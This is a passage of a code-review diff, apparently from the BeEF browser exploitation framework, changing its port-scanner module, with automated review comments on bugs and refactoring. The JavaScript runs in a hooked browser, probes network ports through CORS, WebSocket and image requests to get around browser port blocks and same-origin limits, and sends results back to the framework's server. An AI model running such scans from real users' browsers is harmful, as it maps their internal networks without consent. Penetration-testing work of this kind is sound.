9':'kerberos-adm','750':'kerberos','751':'kerberos_master','752':'qrh','753':'rrh','754':'krb_prop','758':'nlogin','760':'krbupdate','761':'kpasswd','762':'quotad','763':'cycleserv','764':'omserv','765':'webster','767':'phonebook','771':'rtip','773':'submit','774':'rpasswd','775':'entomb','776':'wpages','780':'wpgs','781':'hp-collector','782':'hp-managed-node','783':'spamassassin','786':'concert','787':'qsc','799':'controlit','800':'mdbs_daemon','801':'device','808':'ccproxy-http','871':'supfilesrv','873':'rsync','888':'accessbuilder','898':'sun-manageconsole','901':'samba-swat','953':'rndc','989':'ftps-data','990':'ftps','992':'telnets','993':'imaps','994':'ircs','995':'pop3s','996':'xtreelic','997':'maitrd','998':'busboy','999':'garcon','1000':'cadlock','1002':'windows-icfw','1008':'ufsd','1023':'netvenuechat','1024':'kdm','1080':'socks','8080':'tomcat','8443':'tomcat','8050':'coldfusion','3306':'mysql','5432':'postgres','1521 ':'oracle','1433':'mssql','3389':'msrdp','10088':'zendserver' };
+ var default_services = { '1':'tcpmux','5':'rje','7':'echo','9':'msn','15':'netstat','20':'ftp-data','21':'ftp','22':'ssh','23':'telnet','25':'smtp','26':'rsftp','29':'msgicp','33':'dsp','37':'time','42':'nameserver','43':'whois','53':'dns','67':'dhcps','68':'dhcpc','69':'tftp','70':'gopher','76':'deos','79':'finger','80':'http','88':'kerberos-sec','90':'dnsix','98':'linuxconf','101':'hostname','106':'pop3pw','109':'pop2','110':'pop3','111':'rpcbind','113':'auth','114':'audionews','115':'sftp','118':'sqlserv','119':'nntp','123':'ntp','129':'pwdgen','132':'cisco-sys','133':'statsrv','135':'msrpc','136':'profile','137':'netbios-ns','138':'netbios-dgm','139':'netbios-ssn','143':'imap','144':'news','156':'sqlserv','158':'pcmail-srv','161':'snmp','162':'snmptrap','168':'rsvd','174':'mailq','177':'xdmcp','194':'irc','197':'dls','209':'tam','213':'ipx','217':'dbase','219':'uarps','220':'imap3','223':'cdc','264':'bgmp','315':'dpsi','316':'decauth','346':'zserv','353':'ndsauth','389':'ldap','413':'smsp','414':'infoseek','415':'bnet','416':'silverplatter','440':'sgcp','443':'https','444':'snpp','445':'microsoft-ds','453':'creativeserver','454':'contentserver','456':'macon','457':'scohelp','458':'appleqtc','462':'datasurfsrvsec','464':'kpasswd5','465':'smtps','466':'digital-vrc','480':'loadsrv','486':'sstats','497':'retrospect','500':'isakmp','501':'stmf','516':'videotex','518':'ntalk','522':'ulp','523':'ibm-db2','524':'ncp','525':'timed','526':'tempo','533':'netwall','535':'iiop','538':'gdomap','540':'uucp','541':'uucp-rlogin','542':'commerce','543':'klogin','544':'kshell','545':'ekshell','546':'dhcpconf','547':'dhcpserv','556':'remotefs','557':'openvms-sysipc','560':'rmonitor','561':'monitor','563':'snews','564':'9pfs','625':'apple-xsrvr-admin','626':'apple-imap-admin','631':'ipp','636':'ldapssl','637':'lanserver','660':'mac-srvr-admin','664':'secure-aux-bus','666':'doom','683':'corba-iiop','740':'netcp','741':'netgw','742':'netrcs','744':'flexlm','747':'fujitsu-dev','748':
'ris-cm','749':'kerberos-adm','750':'kerberos','751':'kerberos_master','752':'qrh','753':'rrh','754':'krb_prop','758':'nlogin','760':'krbupdate','761':'kpasswd','762':'quotad','763':'cycleserv','764':'omserv','765':'webster','767':'phonebook','771':'rtip','773':'submit','774':'rpasswd','775':'entomb','776':'wpages','780':'wpgs','781':'hp-collector','782':'hp-managed-node','783':'spamassassin','786':'concert','787':'qsc','799':'controlit','800':'mdbs_daemon','801':'device','808':'ccproxy-http','871':'supfilesrv','873':'rsync','888':'accessbuilder','898':'sun-manageconsole','901':'samba-swat','953':'rndc','989':'ftps-data','990':'ftps','992':'telnets','993':'imaps','994':'ircs','995':'pop3s','996':'xtreelic','997':'maitrd','998':'busboy','999':'garcon','1000':'cadlock','1002':'windows-icfw','1008':'ufsd','1023':'netvenuechat','1024':'kdm','1080':'socks','1434':'ms-sql-m','4489':'radmin','6000':'x11','6446':'mysql-proxy','8080':'tomcat','8443':'tomcat','8050':'coldfusion','3306':'mysql','5432':'postgres','1521 ':'oracle','1433':'mssql','3389':'msrdp','10000':'webmin','10088':'zendserver','11371':'hkp' };
var host = '<%= @ipHost %>';
// TODO: Adjust times for each browser
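Review bot: The `default_services` key `'1521 '` keeps its trailing space on the new line, so `default_services[port_]` is undefined for port 1521 and that port is reported without a service name; it should read `'1521':'oracle'`. The new entries for 1434, 4489, 6000, 6446, 10000 and 11371 have no counterpart in `default_ports` (only 631 was added there), and 6000 is also listed in `blocked_ports`, so it is worth confirming whether the two lists are meant to stay in step. A short comment above `default_services` saying it is a lookup table only, independent of `default_ports`, would settle that. The body of `beef.execute` continues outside the hunk.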
@@ -106,7 +106,7 @@ beef.execute(function() {
{
process_port_cors = true;
port_status_cors = 4; // blocked
- if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=CORS: Port ' + port_ + ' is BLOCKED');}
+ if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is BLOCKED');}
return;
}
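Review bot: The `'ip='+host+'&port=…'` prefix is now written out by hand in ten `beef.net.send` calls (this hunk and the CLOSED/OPEN/TIMEOUT/BLOCKED hunks for CORS, WebSocket and HTTP below), while port_scanner/module.rb parses that exact text with a regex, so a typo in any one copy silently stops results from being stored. A small local helper would keep the wire format in one place, e.g. `function report(method, port, state) { beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port='+method+': Port '+port+' is '+state); }`. The enclosing function starts and ends outside the hunk, so where the helper should live has to be checked against the full file.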
@@ -145,7 +145,7 @@ beef.execute(function() {
if (interval < closetimeout)
{
port_status_cors = 1; // closed
- if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=CORS: Port ' + port_ + ' is CLOSED');}
+ if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is CLOSED');}
} else
{
port_status_cors = 2; // open
@@ -154,7 +154,7 @@ beef.execute(function() {
{
known_service = "(" + default_services[port_] + ")";
}
- beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=CORS: Port ' + port_ + ' is OPEN ' + known_service);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is OPEN ' + known_service);
}
}
@@ -163,7 +163,7 @@ beef.execute(function() {
clearInterval(intID_cors);
process_port_cors = true;
port_status_cors = 3; // timeout
- if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=CORS: Port ' + port_ + ' is TIMEOUT');}
+ if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=CORS: Port ' + port_ + ' is TIMEOUT');}
}
return;
}
@@ -176,7 +176,7 @@ beef.execute(function() {
{
process_port_ws = true;
port_status_ws = 4; // blocked
- if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=WebSocket: Port ' + port_ + ' is BLOCKED');}
+ if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is BLOCKED');}
return;
}
@@ -222,7 +222,7 @@ beef.execute(function() {
if (interval < closetimeout)
{
port_status_ws = 1; // closed
- if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=WebSocket: Port ' + port_ + ' is CLOSED');}
+ if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is CLOSED');}
} else
{
port_status_ws = 2; // open
@@ -231,7 +231,7 @@ beef.execute(function() {
{
known_service = "(" + default_services[port_] + ")";
}
- beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=WebSocket: Port ' + port_ + ' is OPEN ' + known_service);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is OPEN ' + known_service);
}
ws_scan.close();
}
@@ -241,7 +241,7 @@ beef.execute(function() {
clearInterval(intID_ws);
process_port_ws = true;
port_status_ws = 3; // timeout
- if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=WebSocket: Port ' + port_ + ' is TIMEOUT');}
+ if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=WebSocket: Port ' + port_ + ' is TIMEOUT');}
ws_scan.close();
}
return;
@@ -264,7 +264,7 @@ beef.execute(function() {
if (process_port_http == false)
{
port_status_http = 1; // closed
- if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=HTTP: Port ' + port_ + ' is CLOSED');}
+ if (debug_value){ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=HTTP: Port ' + port_ + ' is CLOSED');}
clearInterval(intID_http);
}
process_port_http = true;
@@ -297,7 +297,7 @@ beef.execute(function() {
{
known_service = "(" + default_services[port_] + ")";
}
- beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=HTTP: Port ' + port_ + ' is OPEN ' + known_service);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'ip='+host+'&port=HTTP: Port ' + port_ + ' is OPEN ' + known_service);
}
}
, 1);
@@ -311,7 +311,7 @@ beef.execute(function() {
return;
} else
{
- beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=Scanning: ' + ports_list);
+ beef.net.send('<%= @command_url %>', <%= @command_id %>, 'port=Scanning '+host+' [ports: ' + ports_list + ']');
}
count = 0;
diff --git a/modules/network/port_scanner/config.yaml b/modules/network/port_scanner/config.yaml
index 49d0f094a..262bbd9d8 100644
--- a/modules/network/port_scanner/config.yaml
+++ b/modules/network/port_scanner/config.yaml
@@ -9,8 +9,8 @@ beef:
enable: true
category: "Network"
name: "Port Scanner"
- description: "Scan ports in a given hostname, using WebSockets, CORS and img tags. It uses the three methods to avoid blocked ports or Same Origin Policy."
+ description: "Scan ports in a given hostname, using WebSockets, CORS and img tags. It uses the three methods to avoid blocked ports or Same Origin Policy.
Note: The user may see authentication popups in the event any of the target ports are web servers using HTTP authentication."
authors: ["javier.marcos"]
target:
- working: ["FF", "C"]
+ user_notify: ["FF", "C"]
not_working: ["S", "O", "IE"]
diff --git a/modules/network/port_scanner/module.rb b/modules/network/port_scanner/module.rb
index ab331e20d..afb9c18b1 100644
--- a/modules/network/port_scanner/module.rb
+++ b/modules/network/port_scanner/module.rb
@@ -29,5 +29,23 @@ class Port_scanner < BeEF::Core::Command
content['fail'] = 'No open ports have been found.'
end
save content
+
+ configuration = BeEF::Core::Configuration.instance
+ if configuration.get("beef.extension.network.enable") == true
+ if @datastore['results'] =~ /^ip=([\d\.]+)&port=(CORS|WebSocket|HTTP): Port ([\d]+) is OPEN (.*)$/
+ ip = $1
+ port = $3
+ service = $4
+ session_id = @datastore['beefhook']
+ cid = @datastore['cid'].to_i
+ if !ip.nil?
+ print_debug("Hooked browser found network service [ip: #{ip}, port: #{port}]")
+ r = BeEF::Core::Models::NetworkService.new(:hooked_browser_id => session_id, :proto => 'http', :ip => ip, :port => port, :type => service, :cid => cid)
+ r.save
+ end
+ end
+
+ end
+
end
end
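Review bot: `service = $4` stores the text exactly as command.js builds it, which from the context lines is `"(" + default_services[port_] + ")"` or apparently an empty string, so `:type` is saved as `(http)` with the parentheses, or blank. Stripping them before the insert, e.g. `service = $4.to_s.delete('()')`, would give a usable value. `:proto => 'http'` is hard-coded even when the probe that matched was CORS or WebSocket (`$2` is captured and never used). `ip=([\d\.]+)` never matches when the scan target was given as a hostname, which the module description allows, so those results are not persisted. The method starts outside the hunk.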